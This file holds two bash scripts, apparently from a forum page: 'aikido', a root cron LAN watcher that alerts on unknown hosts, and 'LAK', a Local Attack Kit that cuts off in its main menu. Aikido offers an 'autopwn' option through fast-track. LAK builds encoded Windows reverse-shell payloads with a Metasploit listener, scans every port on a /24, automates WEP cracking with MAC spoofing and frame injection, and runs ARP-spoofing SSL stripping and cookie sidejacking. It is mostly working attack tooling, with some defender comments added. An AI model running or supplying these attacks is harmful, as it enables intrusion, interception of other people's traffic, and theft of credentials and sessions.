
aikido bash script

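#!/bin/bash
#
# aikido - LAN watcher intended to run from root's crontab.
# Based on a script by I.Verges; made by prowl3r.
#
# Ping-sweeps the local subnet with nmap, compares every live host against
# an allowlist of known IPs and MACs, and raises a zenity dialog for each
# host that matches neither. Depending on the answer the host is logged,
# scanned, blocked with iptables or captured with tcpdump.
#
# Limits worth knowing: IP and MAC addresses can both be spoofed, so an
# allowlist hit is not proof of identity, and a miss may simply be a
# legitimate device on a new DHCP lease. Treat every alert as a lead to
# verify, not as a confirmed intrusion.

# Known IPs (include the router). The local IP is appended at run time and
# the sweep range is built from the first entry plus MASK.
declare -a WHITE_IPS=( "192.168.1.1" "192.168.1.2" "192.168.1.3" )

# Known MACs (sample values from the original post; replace them with your
# own full six-octet addresses).
declare -a WHITE_MACS=( "00:11:22:33:44:55" "22:33:44:55:66" )

# Network interface (eth0, wlan0, ra0)
DEVICE="eth0"

# Network mask (24=255.255.255.0, 16=255.255.0.0)
MASK=24

LOG_FILE="/root/aikido.log"
LOG_RULE="---------------------------------------- x ----------------------------------------"

# Output of ifconfig/arp/nmap is parsed below, so pin the locale instead of
# depending on the system language.
export LC_ALL=C

# in_list NEEDLE ITEM...: succeed when NEEDLE equals one of the ITEMs.
in_list() {
  local needle=$1 item
  shift
  for item in "$@"; do
    [[ "$item" == "$needle" ]] && return 0
  done
  return 1
}

# markup_escape TEXT: escape &, < and > before TEXT is shown by zenity.
# zenity renders --text as Pango markup, and the nmap scan output contains
# banner text chosen by the scanned host.
markup_escape() {
  printf '%s' "$1" | sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g'
}

# Help
for opt in "$@"; do
  if [[ "$opt" == "-h" ]]; then
    cat <<'EOF'

aikido dirty script by prowl3r for those bt4f paranoids

Create the daemon: 'crontab -e' and then add the following line:
*/5 * * * * /path-to-aikido/aikido
(execute every 5 minutes)

Start cron just for this session: /etc/init.d/cron start
update-rc.d cron defaults (to start cron at boot time)

Dont forget to set execution rights and run as root. English lang required

To remove, edit crontab and delete aikido line

It looks for connected hosts and records IP (and MAC if available).
Then confirms it's a known IP, otherwise it nmap it and prompts for further actions.
Please, add your interface as well as known IPs and MACs by editing the script.

Use: ./aikido
Options:
    -h Show this help stuff
EOF
    exit
  fi
done

# Allowlisted MACs in lower case, so the comparison with arp output does not
# depend on how the entries were typed.
declare -a KNOWN_MACS=()
for i in "${WHITE_MACS[@]}"; do
  KNOWN_MACS+=( "$(printf '%s' "$i" | tr 'A-F' 'a-f')" )
done

# Local IPv4 address. Handles both "inet addr:1.2.3.4" (old net-tools) and
# "inet 1.2.3.4"; the pattern "inet " skips inet6 lines.
ip=$(/sbin/ifconfig "$DEVICE" 2>/dev/null |
  awk '/inet / { sub(/^addr:/, "", $2); print $2; exit }')
if [[ -n "$ip" ]]; then
  WHITE_IPS+=( "$ip" )
else
  printf 'aikido: no IPv4 address found on %s\n' "$DEVICE" >&2
fi

# Ping sweep in greppable format on stdout.
HOST_IPS=$(/usr/bin/nmap -sP "${WHITE_IPS[0]}/$MASK" -oG -) || {
  printf 'aikido: nmap sweep failed\n' >&2
  exit 1
}

# Allow access to X from crontab
export DISPLAY=:0
export XAUTHORITY="$HOME/.Xauthority"

ipv4_re='^([0-9]{1,3}\.){3}[0-9]{1,3}$'

# One address per "Host:" line, taken as a whole field. The previous
# fixed-column cut truncated 15-character addresses, and the two-digit line
# counter stopped working beyond 99 hosts. The list is read on fd 3 so
# commands inside the loop cannot consume it through stdin.
while IFS= read -r adds <&3; do
  # Only well-formed dotted quads go any further: the value ends up in file
  # names, firewall rules and a shell command line below.
  [[ "$adds" =~ $ipv4_re ]] || continue

  in_list "$adds" "${WHITE_IPS[@]}" && continue

  # Pull the MAC out of the arp output by pattern instead of comparing
  # against one exact error sentence, whose entry count varies.
  ARP=$(/usr/sbin/arp -a "$adds" 2>/dev/null)
  MAC=$(printf '%s\n' "$ARP" |
    grep -oiE '([0-9a-f]{2}:){5}[0-9a-f]{2}' | head -n 1 | tr 'A-F' 'a-f')
  if [[ -z "$MAC" ]]; then
    MAC="Not cached yet"
  elif in_list "$MAC" "${KNOWN_MACS[@]}"; then
    continue
  fi

  # Warn about the unknown host. The literal \n sequences are expanded by
  # zenity in the dialog and by printf %b in the log.
  WARNING="$(/bin/date --rfc-3339=seconds) \n HOST: $adds \n ARP: $MAC"

  zenity --timeout 20 --title "aikido: Intruder detected" --question \
    --text "$WARNING \n\n*** Is this a known host? *** \n\n .- OK: No action will be taken \n .- Cancel: Full scan and log details"

  case $? in
    5)
      # Dialog timed out: nobody is at the screen, keep a record.
      {
        printf '%b\n' "$WARNING"
        printf '%s\n' "*** Logged due to dialog timeout / unattended computer ***"
        printf '%s\n' "$LOG_RULE"
      } >> "$LOG_FILE"
      ;;
    0)
      zenity --title "aikido: Known/safe IP notification" --info \
        --text "\n\nPlease add $adds to the whitelist by manually editing the aikido script, otherwise alerts will keep popping up at crontab execution."
      ;;
    1)
      SCAN=$(/usr/bin/nmap -A -T5 "$adds")
      {
        printf '%b\n' "$WARNING"
        # %s: scan output is remote-influenced, do not expand escapes in it.
        printf '%s\n' "$SCAN"
        printf '%s\n' "$LOG_RULE"
      } >> "$LOG_FILE"

      zenity --width 400 --title "aikido: Preliminary actions taken" --info \
        --text "Host and port/services scan details logged at $LOG_FILE \n\n$WARNING \n\n$(markup_escape "$SCAN")"

      a="Nah, I'll take care myself (keep alert showing)"
      b="Try to autopwn using fast-track"
      c="Block this host with iptables"
      d="Capture tcpdump session for this host"

      OPTION=$(zenity --width 380 --height 230 --title "aikido: Countermeasures" \
        --list --text "Now for the fun part. What you wanna do?" --radiolist \
        --column "Pick" --column "Action" \
        TRUE "$a" FALSE "$b" FALSE "$c" FALSE "$d")

      case "$OPTION" in
        "$a")
          continue
          ;;
        "$b")
          # NOTE(review): kept as on the page. The alert rests on spoofable
          # identifiers, so a false positive here is aimed at a legitimate
          # device; $adds is already restricted to a dotted quad above.
          /opt/kde3/bin/konsole --vt_sz 80x40 -noclose \
            --workdir /pentest/exploits/fasttrack/ \
            -e sh -c " python fast-track.py -c 2 $adds -r "
          ;;
        "$c")
          # Drops traffic from the host to this machine only; the rule is
          # not persistent and does not protect other hosts on the LAN.
          /sbin/iptables -A INPUT -s "$adds" -j DROP
          blocked=$(/sbin/iptables -L)
          zenity --title "aikido: Blocked host notification" --info \
            --text "$(markup_escape "$blocked")"
          ;;
        "$d")
          /usr/sbin/tcpdump -i "$DEVICE" host "$adds" -s 1500 \
            -w "/root/$adds.pcap" &
          tcpdump_pid=$!
          zenity --title "aikido: Recording activity for host $adds" --info \
            --text "\n\n *** To stop tcpdump recording, just press OK *** \n\n(Use the following command to replay: \n\ntcpdump -r /root/$adds.pcap)"
          # Stop only the capture started here, with SIGTERM so tcpdump can
          # flush the pcap; killall -9 hit every tcpdump on the machine and
          # could leave a truncated file.
          kill "$tcpdump_pid" 2>/dev/null
          wait "$tcpdump_pid" 2>/dev/null
          ;;
      esac
      ;;
    *)
      # zenity could not show the dialog (for example no X session when run
      # from cron): record the detection instead of dropping it.
      {
        printf '%b\n' "$WARNING"
        printf '%s\n' "*** Logged because the alert dialog could not be shown ***"
        printf '%s\n' "$LOG_RULE"
      } >> "$LOG_FILE"
      ;;
  esac
done 3< <(printf '%s\n' "$HOST_IPS" | awk '/^Host:/ { print $2 }')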

LAK

#!/bin/sh

# autonmap: show the LAK banner, then run nmap against the /24 around the
# address read from the routing table and write the result to ./report.
autonmap() {
clear
cat <<EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------'        
EOF
OS=`uname`
IO="" # store IP
# On Linux, IP is field 3 of every `ip route show` line containing "via"
# (the next-hop address); any other system gets the literal "Unknown".
case $OS in
Linux) IP=`ip route show  | grep 'via'| awk '{ print $3}'`;;
*) IP="Unknown";;
esac
echo "Scanning $IP/24 This Could Take Some Time"

# -PN skips host discovery, -O and -sV add OS and service detection, the
# port range covers every TCP port, --open lists open ports only and -oN
# writes a normal-format report into the working directory.
# Defender view: probing every port on every address of a /24 is loud; it
# stands out in flow records and in IDS port-scan detections.
nmap -PN -O -sV  $IP/24 -p 0-65535 --open  -oN report
}
# Windowsx86: interactive prompt for a 32-bit Windows payload. Reads a
# payload name (List), an encoder name (A), an IP and a port from stdin,
# writes an executable to /root/out.exe with msfpayload and then starts a
# multi/handler listener with msfcli.
# Defender view: the artefact is a Metasploit-generated executable that a
# user has to run; application allowlisting on endpoints and egress
# filtering of unexpected outbound connections are the controls that apply.
Windowsx86() {
clear
cat << EOF 

Please Select A Payload:

windows/meterpreter/bind_ipv6_tcp                Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_tcp                     Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/find_tag                     Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
windows/meterpreter/reverse_ipv6_tcp             Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_tcp                  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/shell/bind_tcp                           Windows Command Shell, Bind TCP Stager
windows/shell/find_tag                           Windows Command Shell, Find Tag Ordinal Stager
windows/shell/reverse_ipv6_tcp                   Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_tcp                        Windows Command Shell, Reverse TCP Stager
windows/shell_bind_tcp                           Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw                      Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp                        Windows Command Shell, Reverse TCP Inline
windows/vncinject/bind_ipv6_tcp                  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_tcp                       VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/find_tag                       VNC Server (Reflective Injection), Find Tag Ordinal Stager
windows/vncinject/reverse_ipv6_tcp               VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_tcp                    VNC Server (Reflective Injection), Reverse TCP Stager



EOF
echo -n "LAK>"
# List: payload name typed by the operator.
read List
clear
cat << EOF

Please Select A Encoder:
 
x86/alpha_mixed            Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper            Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower     Avoid UTF8/tolower
x86/call4_dword_xor        Call+4 Dword XOR Encoder
x86/countdown              Single-byte XOR Countdown Encoder
x86/fnstenv_mov            Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha               Non-Alpha Encoder
x86/nonupper               Non-Upper Encoder
x86/shikata_ga_nai         Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed          Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper          Alpha2 Alphanumeric Unicode Uppercase Encoder

EOF

echo -n "LAK>"
# A: encoder name typed by the operator.
read A
clear
echo -n "Please enter your ip: "
echo 
echo -n "LAK>"
read ip
clear
echo -n "Pleas enter port: "
echo 
echo -n "LAK>"
read port
echo 
echo -n "Please Wait While Payload is Generated...."
clear
sleep 1
# The prompted values are expanded unquoted into both command lines; the
# executable is written to the fixed path /root/out.exe.
msfpayload windows/shell/reverse_tcp  LHOST=$ip LPORT=$port ENCODING=$A X > /root/out.exe

# Starts the listener in the foreground with the same address and port.
msfcli exploit/multi/handler PAYLOAD=$List LHOST=$ip LPORT=$port ENCODING=$A E  

}

# Windowsx64: same prompt sequence as Windowsx86 with the 64-bit payload
# list. Reads a payload name (List), an encoder name (A), an IP and a port,
# writes /root/out.exe with msfpayload and starts a multi/handler listener.
# Defender view: as with the 32-bit variant, the output only matters once a
# user runs it; application allowlisting and egress filtering apply.
Windowsx64() {
clear
 cat << EOF 
Please Select A Payload:
    
windows/x64/exec                        Execute Command
windows/x64/meterpreter/bind_tcp        Meterpreter,Bind TCP Stager
windows/x64/meterpreter/reverse_tcp     Meterpreter,Reverse TCP Stager
windows/x64/shell/bind_tcp              Command Shell,Bind TCP Stager
windows/x64/shell/reverse_tcp           Command Shell,Reverse TCP Stager
windows/x64/shell_bind_tcp              Command Shell,Bind TCP Inline
windows/x64/shell_reverse_tcp           Command Shell,Reverse TCP Inline
 

EOF
echo -n "LAK>"
# List: payload name typed by the operator.
read List
clear
cat << EOF

Please Select A Encoder:
 
x86/alpha_mixed            Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper            Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower     Avoid UTF8/tolower
x86/call4_dword_xor        Call+4 Dword XOR Encoder
x86/countdown              Single-byte XOR Countdown Encoder
x86/fnstenv_mov            Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha               Non-Alpha Encoder
x86/nonupper               Non-Upper Encoder
x86/shikata_ga_nai         Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed          Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper          Alpha2 Alphanumeric Unicode Uppercase Encoder

EOF
echo -n "LAK>"
# A: encoder name typed by the operator.
read A
clear
echo -n "Please enter your ip: "
echo 
echo -n "LAK>"
read ip
clear
echo -n "Pleas enter port: "
echo 
echo -n "LAK>"
read port
echo 
echo -n "Please Wait While Payload is Being Generated...."
clear
sleep 1
# The prompted values are expanded unquoted into both command lines; the
# executable is written to the fixed path /root/out.exe.
msfpayload windows/x64/shell/reverse_tcp  LHOST=$ip LPORT=$port ENCODING=$A X > /root/out.exe

# Starts the listener in the foreground with the same address and port.
msfcli exploit/multi/handler PAYLOAD=$List LHOST=$ip LPORT=$port ENCODING=$A E  

}

# menu12: clear the screen and print the banner, the payload-type choices
# and the "LAK>" prompt. It only prints; the answer is read by loop().
menu12() {
clear
cat << EOF
      
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF


           echo "   Please Select A Payload Type"
        echo
        echo "      1. Windowsx64"
        echo "      2. Windowsx86"
        echo "      3. Exit"
        echo 
        echo
        echo -n "LAK>"
   


}
# loop: payload-generator menu loop. Prints menu12, reads one answer from
# stdin and dispatches: 1 -> Windowsx64, 2 -> Windowsx86, 3 -> exit the
# whole script. There is no way back to the calling menu other than exit.
loop() {

   while true
   do
   menu12
   read answer
   case $answer in
   1)
       Windowsx64
  ;;   
   2)
      Windowsx86
  ;;
   3)
      exit
  ;;
   *)
      # Any other answer re-enters loop() from inside its own while loop,
      # so each invalid entry adds one level of nesting.
      loop
  ;;
   esac
   done
}





# Dispatch on the first command-line argument. None of helploop, filoop,
# procloop or statloop is defined in the visible part of this listing, so
# each arm presumably fails with "command not found" and execution falls
# through to the definitions that follow -- confirm against the full file.
case "$1" in
    help)
   helploop
  ;;

    file)
      filoop
   ;;
   
    text)
   procloop
  ;;

   status)
   statloop
  ;;      

    *)
   helploop
  ;;
esac



# wepcracker: defines the WEP helpers and their menu, then enters the menu
# loop (both arms of the closing case call menu2). Every helper drives tools
# from the aircrack-ng suite against WEP-protected networks.
# Shell functions are global, so calling wepcracker also (re)defines menu1
# and menu2 for the rest of the script.
# Defender view: a WEP key is recoverable from captured IVs no matter how
# strong the key is; the remediation is WPA2/WPA3, not a different WEP key.
# The helpers use the fixed source MAC 00:11:22:33:44:55 and inject frames,
# both of which a wireless IDS can alert on.
wepcracker() {
# macspoof: prompt for a MAC address and set it on the wlan interface with
# macchanger, taking the interface down and up around the change.
macspoof() {
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
# DEVICE: first field of the `ifconfig -a` lines matched by the wlan pattern.
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo -n "Please Enter Mac Address You Would Like To Spoof: "
read spoof
ifconfig $DEVICE down
macchanger -m $spoof $DEVICE
clear 
ifconfig  $DEVICE up
echo "Your New Mac Address is $spoof"
} 

# korekchopchop: menu entry "Clientless Korek Chop Chop". Sets the fixed MAC,
# captures WEP networks for ten seconds, asks for a BSSID, looks up its
# channel in out-01.csv, then runs the capture, replay, packet-forging and
# key-recovery tools in sequence and deletes the working files.
korekchopchop() { 
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
# Survey capture runs in its own xterm for ten seconds and writes out-*.
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

# Ends every xterm owned by the user, not only the one started above.
killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm -e aireplay-ng -4 -b $bss -h $mac  $DEVICE 
xterm -e packetforge-ng -0 -a $bss -h $mac -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w /root/frag 
xterm -e aireplay-ng -2 -r frag -h $mac $DEVICE &
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng 
# Working files are removed from the current directory by glob.
rm out*
rm wep-0*
rm replay_*
rm frag
}

# framentation: menu entry "Clientless Fragmentation". Same sequence as
# korekchopchop with aireplay-ng mode -5 and fragment*.xor as the keystream
# file.
framentation() {
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm  -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm  -e aireplay-ng -5 -b $bss -h $mac  $DEVICE 
xterm  -e packetforge-ng -0 -a $bss -h $mac -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w frag 
xterm  -e aireplay-ng -2 -r frag -h $mac $DEVICE
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng 
rm out*
rm wep-0*
rm replay_*
rm frag
}

# injectiontest: menu entry "Injection Test". Runs aireplay-ng -9 on the
# detected wlan interface.
injectiontest() {
clear
OS=`uname`
IO="" 
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
aireplay-ng -9 $DEVICE
}

# client0841: menu entry "Client Based 0841". Same survey and BSSID prompt
# as the other helpers, followed by aireplay-ng mode -2 with a broadcast
# destination and the key-recovery step.
client0841() {
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm -e aireplay-ng -2 -b $bss -t 1 -d FF:FF:FF:FF:FF:FF  -h $mac $DEVICE.&
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng
rm out* 
rm wep-0*
rm replay_*
}



# arpreplay: menu entry "Client Based Arp Replay". Same survey and BSSID
# prompt, followed by aireplay-ng mode -3 and the key-recovery step.
arpreplay() { 
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm -e aireplay-ng -3 -b $bss -h $mac $DEVICE &
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng 
rm out*
rm wep-0*
rm replay_*
}

# menu1 (WEP): print the banner in colour 9, the list of WEP options and the
# prompt. It only prints; menu2 reads the answer.
menu1() {
   clear
tput setaf 9; cat << EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------'        
            
EOF
   
echo "   Please Select A Type Of Attack"
echo
echo "      1. Client Based Arp Replay"
echo "      2. Client Based 0841"
echo "      3. Clientless Fragmentation"
echo "      4. Clientless Korek Chop Chop"
echo "      5  Injection Test"
echo "      6. Spoof Mac Address"
echo "      7. Exit"
echo
echo -n "     LAK>"
}
# menu2 (WEP): loop forever showing menu1 and dispatching the answer to the
# helper with the matching number; 7 exits the whole script.
menu2() {

   while true
   do
   menu1
   read answer
   case $answer in
   1)
      arpreplay
  ;;   
   2)
      client0841
  ;;
   3)
      framentation
  ;;
   4)
      korekchopchop  
  ;;
   5)
      injectiontest
  ;;
   6)
    macspoof
  ;;
   7)
    exit
  ;;
   *)
     menu2
  ;;
   esac
   done
}

# Both arms start the WEP menu; "$1" here is wepcracker's own first argument.
case "$1" in
    help)
   menu2
  ;;     

    *)
   menu2
  ;;
esac
}
# sslsniff: menu entry "SSL Sniffing". Detects the wlan interface and the
# gateway, asks for a target IP, enables IP forwarding, redirects TCP port
# 80 to local port 8080, and starts arpspoof, sslstrip and ettercap between
# the target and the gateway.
# Defender view: the technique depends on ARP spoofing and on the victim
# starting over plain HTTP. Dynamic ARP inspection (or a static gateway ARP
# entry) addresses the first; HSTS with preloading addresses the second.
# On the wire it shows as the gateway IP suddenly mapping to a new MAC.
# The function leaves ip_forward enabled and the REDIRECT rule in place.
sslsniff() {
clear
cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF
OS=`uname`
IO="" 
# iface: first field of the `ifconfig -a` lines matched by the wlan pattern.
case $OS in
   Linux) iface=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) iface="Unknown";;
esac
OS=`uname`
IO="" 
# tdg: field 3 of the `ip route show` lines containing "via" (the gateway).
case $OS in
   Linux) tdg=`ip route show |grep "via" | awk  '{print $3}'`;;
   *) tdg="Unknown";;
esac
echo -n "Please Enter Target Ip To Sniff: "
read tip
clear
cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 
EOF

echo "The selected interface is $iface"
echo "The target gateway is $tdg"
echo "Starting....."
sleep 2 
clear
# Kernel forwarding on, and every TCP/80 packet arriving at this host is
# redirected to the local listener on 8080.
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
xterm -e arpspoof -i $iface -t $tip $tdg &
xterm -e  python /pentest/web/sslstrip/sslstrip.py -a -l 8080 &
clear
ettercap -T -q -i $iface -M arp:remote /$tip/ /$tdg/

}

# sidejack: menu entry "Side Jacking". Asks the operator to point Firefox at
# the proxy on 127.0.0.1:1234, starts ferret on the wlan interface in the
# background and hamster in an xterm, then kills both when the xterm closes.
# Defender view: this class of tool reads session cookies from unencrypted
# traffic, so serving the whole session over TLS and setting the Secure
# flag on session cookies removes what it relies on.
sidejack() {
clear
cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF
echo -n "Please Set Proxy to http://127.0.0.1 on port 1234 in firefox"
echo
sleep 5 
echo 
OS=`uname`
IO="" 
# iface: first field of the `ifconfig -a` lines matched by the wlan pattern.
case $OS in
   Linux) iface=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) iface="Unknown";;
esac 
/pentest/sniffers/hamster/ferret -i $iface & 
# Blocks until the hamster xterm is closed.
xterm -e /pentest/sniffers/hamster/hamster 
killall hamster
killall ferret
}
# menu1 (main): clear the screen and print the banner, the Local Attack Kit
# main menu and the prompt. It only prints; menu2 reads the answer.
menu1(){
clear
cat << EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 
                           
Local Attack Kit Main Menu :                            

     1. WEP Cracking
     2. WPA Cracking
     3. SSL Sniffing
